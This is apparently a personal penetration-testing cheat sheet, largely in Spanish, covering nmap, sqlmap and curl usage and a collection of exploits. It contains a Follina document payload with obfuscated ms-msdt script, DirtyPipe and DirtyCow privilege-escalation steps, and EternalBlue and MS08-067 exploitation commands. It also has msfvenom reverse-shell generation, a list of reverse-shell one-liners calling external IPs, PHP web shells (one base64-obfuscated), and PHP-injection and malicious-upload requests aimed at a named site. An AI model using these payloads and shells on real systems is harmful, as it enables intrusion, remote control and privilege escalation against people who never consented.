Hx

Nmap

Nmap ("Network Mapper") es una herramienta de código abierto para exploración de red y auditoría de seguridad.

Escaneo Básico

• nmap [dirección IP o dominio] Escaneo de un host individual
• nmap [IP1,IP2,IP3]Escaneo de múltiples direcciones IP
• nmap [rango de IP] (ejemplo: nmap 192.168.1.1-100) Escaneo de un rango de direcciones IP
• nmap [dirección IP/CIDR] (ejemplo: nmap 192.168.1.0/24) Escaneo de un rango de direcciones con CIDR:

Escaneo de Puertos

• nmap -F [dirección IP] Escaneo rápido de los 100 puertos más comunes
• nmap -p [lista de puertos] [dirección IP] (ejemplo: nmap -p 80,443 192.168.1.1) Escaneo de puertos específicos
• nmap -p- [dirección IP] Escaneo de todos los puertos (1-65535)

Detección de Servicios y Versiones

• nmap -sV [dirección IP] Detección de servicios/versiones

Detección de Sistemas Operativos

• nmap -O [dirección IP] Detección de sistemas operativos

Técnicas de Escaneo

• nmap -sS [dirección IP] Escaneo SYN (half-open)
• nmap -sT [dirección IP] Escaneo TCP Connect (completo)
• nmap -sU [dirección IP] Escaneo UDP

Escaneo Agresivo

• nmap -A [dirección IP] Escaneo agresivo (detecta servicios, versiones y realiza un escaneo de OS)

Evadir Firewalls/IDS

• nmap -f [dirección IP] Fragmentación de paquetes
• nmap --mtu [tamaño] [dirección IP] Especificar MTU personalizado
• nmap --randomize-hosts [dirección IP] Escaneo en horas aleatorias (menos sospechoso)

Salida y Guardado de Resultados

• nmap -oN [nombre de archivo] [dirección IP] Guardar resultados en un archivo (formato normal)
• nmap -oX [nombre de archivo] [dirección IP] Guardar resultados en un archivo XML
• nmap -oA [base de nombre de archivo] [dirección IP] Guardar resultados en todos los formatos disponibles

Uso de Scripts NSE

• nmap --script=[nombre del script] [dirección IP] Ejecutar scripts específicos
• nmap --script=[categoría] [dirección IP] Ejecutar una categoría de scripts

Revesing .NET

https://github.com/dnSpyEx/dnSpy

Algunos comandos de Windows

• Comandos básicos de CMD: para descripción agregar /? al comando

  • cd: Cambia de directorio. cd ../../../ se regresa 3 directorios.
  • dir o ls: Lista los contenidos del directorio actual.
  • copy: Copia archivos.
  • move: Mueve archivos.
  • del: Elimina archivos.
  • mkdir: Crea un directorio.
  • rmdir: Elimina un directorio.
  • ping: Comprueba la conectividad de red.
  • ren: Cambia el nombre de un archivo.
  • cls o clear: Limpia la pantalla.
  • type: Muestra el contenido de un archivo.
  • attrib: Muestra o modifica los atributos de un archivo o carpeta.
  • ipconfig: Muestra la configuración de red.
  • netstat -ano: Muestra estadísticas de red y conexiones activas en nuestra máquina con Id de proceso.
  • ping: Comprueba conectividad.
  • taskkill /f /pid <PID>: Finaliza un proceso en base a su ID.
  • taskkill /F /IM nombre_proceso.exe: Finaliza un proceso en base a su imagen.
  • systeminfo: Muestra información detallada sobre el sistema.
  • arp -a: Muestra todas las ips guardadas en cache.
  • find: Busca una cadena de texto en un archivo o archivos.
  • findstr: Busca patrones de texto en archivos. Es más avanzado que find y permite expresiones regulares.
  • xcopy: Copia archivos y directorios, incluyendo sus subdirectorios, con varias opciones de personalización.
  • robocopy: "Robust File Copy". Este comando es una versión más avanzada de copy, diseñada para la replicación de datos más fiable y con mayor capacidad de configuración.
  • chkdsk: Verifica el sistema de archivos y el estado del disco duro, y muestra un informe.
  • diskpart: Una herramienta de línea de comandos para gestionar discos, particiones o volúmenes.
  • sfc /scannow: Escanea y repara archivos del sistema Windows dañados.
  • net user: Administra cuentas de usuario.
  • shutdown: Apaga o reinicia el ordenador.
  • restart: Reinicia el ordenador.
  • gpupdate: Actualiza las políticas de grupo manualmente.
  • gpresult: Muestra el resultado de las políticas de grupo aplicadas a un sistema o usuario.
  • path: Muestra o establece las rutas de búsqueda de archivos ejecutables.
  • set: Muestra, establece o elimina variables de entorno de Windows.
  • netsh: Una herramienta que permite configurar casi cualquier aspecto de las redes en Windows.
  • powercfg: Permite gestionar la configuración de energía y los planes de energía.
  • reg: Una herramienta de línea de comandos para leer, establecer o eliminar claves y valores del registro de Windows.
  • cipher: Muestra o modifica el cifrado de directorios/archivos en unidades NTFS.
  • wmic: Interfaz de línea de comandos (CLI) para WMI (Instrumental de Administración de Windows) que permite realizar consultas de gestión en sistemas locales o remotos.

• Hacer ping a todos los dispositivos en la red 192.168.1.X mandando solo 1 paquete ( -n 1)

  for /L %i in (1,1,254) do ping 192.168.1.%i -n 1
  1..254 | ForEach-Object { ping 192.168.1.$_ -n 1 } //Powershell

MySQL

mysql -h 127.0.0.1 -P 3306 -u root -p supersecretdb

FTP

• ftp hostname or ftp://username:password@hostname
• cd foldername
• get filename
• put filename
• mget filenameregex *mget download all files
• mput filemameregex *mput .txt upload all .txt files
• binary when havingtrouble?

SQLmap

Simple POST

sqlmap -u "https://recoindustrial.com/vuln.php" --data "parameter1=1¶meter2=2¶meter3=3" -p "parameter1,parameter2" --method POST

Simple GET

sqlmap -u "https://recoindustrial.com/vuln.php" -p "a,b"

SQLmap crawl

sqlmap -u "https://recoindustrial.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

cURL

Ver Ip publica

curl ifconfig.co

Agregar Custom UserAgent

curl -A 'Mozilla/5.0 (ZOMBIE:REX)'

Buscar si un sitio contiene la palabra Hola

curl -v --silent https://recoindustrial.com 2>&1 | grep `Hola`

Usar proxy

curl -x GET mysite.com --proxy yourproxy:port

POST con parametros

curl -X POST -F 'name=Hello' -F 'email=hello@world.com' https://recoindustrial.com/post.php

POST que intenta inyectar codigo

curl -X POST --data "<?php echo 'p4y10ad' ?>" "https://recoindustrial.com/index.php?page=php://input%00" -k -v

Upload con parametros

curl -F pass=rex -F usr=rex -F myfile=@/home/pwn.php http://recoindustrial.com/upload.php

Nmap

https://github.com/nmap

Uso simple:

nmap 192.168.0.0/24or nmap -F 10.80.0.0/24

Scan sin puertos:

nmap -sn 192.168.0.0/24

Scan sin ping:

nmap -Pn 192.168.0.0/24

Scan y guardar en archivo ip:

nmap -sn -oG - 192.168.0.0/24 | grep -Eo "[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}" | sort | uniq > ipscan.txt

Scan ports

nmap -sV -p 21,443 192.168.0.1

Scan all ports from ip

nmap -p- 192.168.0.1

Scan for operative system id

nmap -O 192.168.0.1

Nmap script vulnerable:

nmap -Pn -sV --script=vulners 192.168.0.1

Nmap script Vulscan:

nmap -sV --script=scipag_vulscan/vulscan.nse 192.168.0.1

NSE github

http-enum.nse

nmap -n -p80 --script http-enum 192.168.0.1

http-wordpress-enum.nse

nmap -n -p80 --script http-wordpress-enum 192.168.0.1

Scan via DNS:

nmap --dns-servers 8.8.4.4,8.8.8.8 -sL 192.168.0.0/24

TOR

• sudo apt-get install tor
• sudo service tor start
• sudo service tor stop

Check if TOR is UP

• curl --socks5 localhost:9050 --socks5-hostname localhost:9050 -s https://check.torproject.org/api/ip
• curl --socks5 localhost:9050 --socks5-hostname localhost:9050 -s https://check.torproject.org/ | cat | grep -m 1 Congratulations | xargs

Make request

• curl --socks5-hostname localhost:9050 https://check.torproject.org

grep

Find urls in file

cat Hx.md | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*" | sort -u

Find *something.php inside file:

cat Hx.md | grep -oP '[a-zA-Z0-9./?=_%:-]*\.md' $1 | sort -u

Find emails in file.tx and sends it to e.txt a@b.com

cat Hx.md | grep -Eiorh '([[:alnum:]_.-]+@[[:alnum:]_.-]+?\.[[:alpha:].]{2,6})' "$@" * | sort | uniq > dummy.md

Show diferent file types and count

find . -type f | egrep -i -E -o "\.{1}\w*$" | sort | uniq -c

Check for certain files by filetype

find . -type f -name "*.md"

Find recursively file link inside the files in folders

grep -inr "[a-zA-Z0-9./?=_%:-]*\.md" --include \*.md ./

Regular expresions

• 192\.168\.1\.254 certain ip
• [[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3} only ips
• \b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b for email
• [[:digit:]]\{2\}[ -]\?[[:digit:]]\{10\} phone number pattern 99-1234567890
• ([A-Za-z ]*) paragraph inside (braces)
• end$
• some[^[:space:]]+ anything starting with ´some'
• [AEIOUaeiou]{3} things that have more than 3 vocals
• [[:alpha:]]{12,14} words of certain length
• grep -e '--test--' searching for -test-
• A[0-9][0-9] searching for A00 to A99

Fuzz

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/big-list-of-naughty-strings.txt#L111-L115

alt+64 = @

alt+39 = ‘

alt+168 = ¿

alt+63= ?

No-Break Space

• ALT + 255
• Número en Unicode
  • U+00A0
• Código HTML
  •  
• Código CSS
  • \00A0
• Entidad
  •  

Exploits

Common CVE's amd Exploits Add folina, eternal.blue, dirty cow

Windows RCE

https://github.com/cryp2cat/pocs/tree/main/CVE-2022-30190

• Follina CVE-2022-30190

Unzip word document

edit the doc/word/_rels/document.xml.rels

<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://127.0.0.1:8000/index.html!" TargetMode="External"/>

Change the Target reference 127.0.0.1 to server hosting payload

Payload open notepad:

<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bm90ZXBhZC5leGU='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"";//longstringfornottriggeringpassword \n</script>

MS Offic RCE aka msdt follina

• JohnHammond vid
  • Johns poc in github

Linux priviledge escalation

• DirtyPipe CVE-2022-0847

Linux Privilege Escalation - Linux Kernel 5.8 < 5.16.11

A.Ahmed A collection of exploits and documentation for penetration testers and red teamers that can be used to aid the exploitation of the Linux Dirty Pipe vulnerability.

Hijacks a SUID binary to spawn a root shell

find / -perm -4000 2>/dev/null
./exploit /usr/bin/sudo

• DirtyCow CVE-2016-5195

Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8

FireFart This exploit uses the pokemon exploit of the dirtycow vulnerability as a base and automatically generates a new passwd line.

gcc -pthread dirty.c -o dirty -lcrypt

./dirty my-new-password

mv /tmp/passwd.bak /etc/passwd

# make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c

Android exampleThis repository demonstrates the vulnerability on vulnerable Android devices attached via ADB. It does not disable SELinux or install superuser on the device.

• Full Nelsom CVE-2010-4258

Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)

• Mempodipper CVE-2012-0056

Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)

• RDS CVE-2010-3904

Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8

Windows privilege escalation

• [MS08-067 (NetAPI)]()

Check the vulnerability with the following nmap script.

Exploit:

nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 <ip_netblock>

exploit/windows/smb/ms08_067_netapi

https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
python ms08-067.py 10.0.0.1 6 445

• MS10-015 (KiTrap0D)

Microsoft Windows NT/2000/2003/2008/XP/Vista/7 User Mode to Ring Escalation (MS10-015)

https://www.exploit-db.com/exploits/11199

exploit/windows/local/ms10_015_kitrap0d

• MS11-080 (afd.sys)

Microsoft Windows XP/2003

Python: https://www.exploit-db.com/exploits/18176
Metasploit: exploit/windows/local/ms11_080_afdjoinleaf

• [MS15-051 (Client Copy Image)]()

Microsoft Windows 2003/2008/7/8/2012

printf("[#] usage: ms15-051 command \n");
printf("[#] eg: ms15-051 \"whoami /all\" \n");

# x32
https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe

# x64
https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
use exploit/windows/local/ms15_051_client_copy_image

• [MS16-032]()

Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)

#Check if the patch is installed :
wmic qfe list | findstr "3139914"

#Powershell:
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

Binary exe : https://github.com/Meatballs1/ms16-032

Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc

• [MS17-010 (Eternal Blue)]()

Check and exploit:

crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010.

nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock>

Metasploit modules to exploit

EternalRomance/EternalSynergy/EternalChampion
auxiliary/admin/smb/ms17_010_command          MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010            MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue      MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec           MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

If you can't use Metasploit and only want a reverse shell.

git clone https://github.com/helviojunior/MS17-010

# generate a simple reverse shell to use
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
python2 send_and_execute.py 10.0.0.1 revshell.exe

• [CVE-2019-1388]()

Windows 7, Windows 10 LTSC 10240

Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html

Detailed information about the vulnerability :
https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege

Windows:

• winPEAS

  • Simple test

  $url="https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe";
  
  $wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content));
  

  • Base64 download

  $url = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe";
  
  [Convert]::ToBase64String([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)) | Out-File -Encoding ASCII C:\RX\w64.txt
  
  $b64 = Get-Content -Path C:\RX\wp64.txt
  
  $wp=[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b64));
  

• PEAS downloads

• LOLBAS github

• Windows CVEs

• Windows security

• Hackersploit

• Windows exploit suggester

  • git clone https://github.com/bitsadmin/wesng --depth 1
  • wes.py --update
  • systeminfo > systeminfo.txt
  • ./wes.py /root/systeminfo.txt

Linux:

• PEAS

  curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

• GTFO bins
• Linux Security
• [Linux exploit sugester]()
  • ./linux-exploit-suggester.sh --uname <uname-string>

Compiling

• When compiling with gcc run :

  • sudo apt-get install libnftnl-dev
  • sudo apt-get install gcc-multilib

• Compile code

  • gcc -m32 -static -o exploit -Wall exploit.c
  • gcc exploit.c -o exploit -lmnl -lnftnl -no-pie -lpthread

• To create Windows executables mingw cross-compiler:

  • sudo apt-get install mingw-w64
  • i686-w64-mingw32-gcc -o main32.exe main.c
  • x86_64-w64-mingw32-gcc -o main64.exe main.c

SSH Copy

Copy something from another system to this system:

• scp root@66.228.51.17:/root/vulns.txt C:/RX/

Copy something from this system to some other system:

• scp /path/to/local/file username@hostname:/path/to/remote/file

Copy something from some system to some other system:

• scp username1@hostname1:/path/to/file username2@hostname2:/path/to/other/file

Shells

• Villain.py
  • Generate shells notes
• Revshells web
• bash -i >& /dev/tcp/139.162.53.191/9000 0>&1
• <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/6969 0>&1'");?>
• <?php system($_GET["cmd"]); ?>
• python -c 'import socket as a;s=a.socket();s.connect((\"127.0.0.1\",6969));exec(s.recv(999))'
• import pty,os;os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash");s.close()
• nc -e /bin/sh 127.0.0.1 6969
• require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/80 0>&1');
• ruby -rsocket -e'f=TCPSocket.open("127.0.0.1",6969).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

Metasploit:

https://docs.metasploit.com/

• https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html
• https://nooblinux.com/metasploit-tutorial/

hWeb info

Google Hacking Database

Web Dork list

SqlMap

PayloadsAllTheThings

Reverse shells

File uploads

PHP insecure

PHP insecure 2

• <?php passthru($_GET['cmd']) ?>
• <?php eval(base64_decode('cGFzc3RocnUoJF9HRVRbJ2NtZCddKQ==')); ?>
• include("data:text/plain;base64,$_GET[cmd]");
• include("zlib:script2.png.gz");

Tools & stuff

Motorola root

Moto g6

• :Install abd &fastboot
• :Set android developer mode
• :Activate OEM and usb debugging
• :Connect via $: adb devices
• :Open bootloader via $: adb reboot bootloader
• :Check conn with fastboot via $: fastboot devices
• :Get unlock CODE#1 via $: fastboot oem get_unlock_data
• :Remove unecessary data adn request unlock CODE#2 in Motorola site
• :Unlock bootloader via $: fastboot oem unlock CODE#2
• :Write TWRP via $: fastboot flash recovery twrp*
• :On phone open recovery mode to enter twrp
• :Wipe data
• :Send ROM + PKGs via $: adb push filename.zip /data/media
• :Install ROM
• :First boot and phone config
• :Reboot bootloader and Re-flash recovery twrp
• :Install magisk with twrp
• :Reboot, and confirm root.

Install burp certificate for proxy server

• Download cert in DER format
• Convert DER to PEM
  • openssl x509 -inform DER -in cacert.der -out cacert.pem
• Get subject_hash_old (or subject_hash if OpenSSL < 1.0)``
  • openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1
• Rename cacert.pem to .0 mv cacert.pem 9a5ba575.0
• Remount and copy cert to device adb push 9a5ba575.0 /sdcard/
• Go to phone terminal Termux su -
• Set system filesys to write
  • mount -o rw,remount,rw /system
  • mv /sdcard/9a5ba575.0 /system/etc/security/cacerts/
  • chmod 644 /system/etc/security/cacerts/9a5ba575.0
  • mount -o ro,remount,ro /system
  • reboot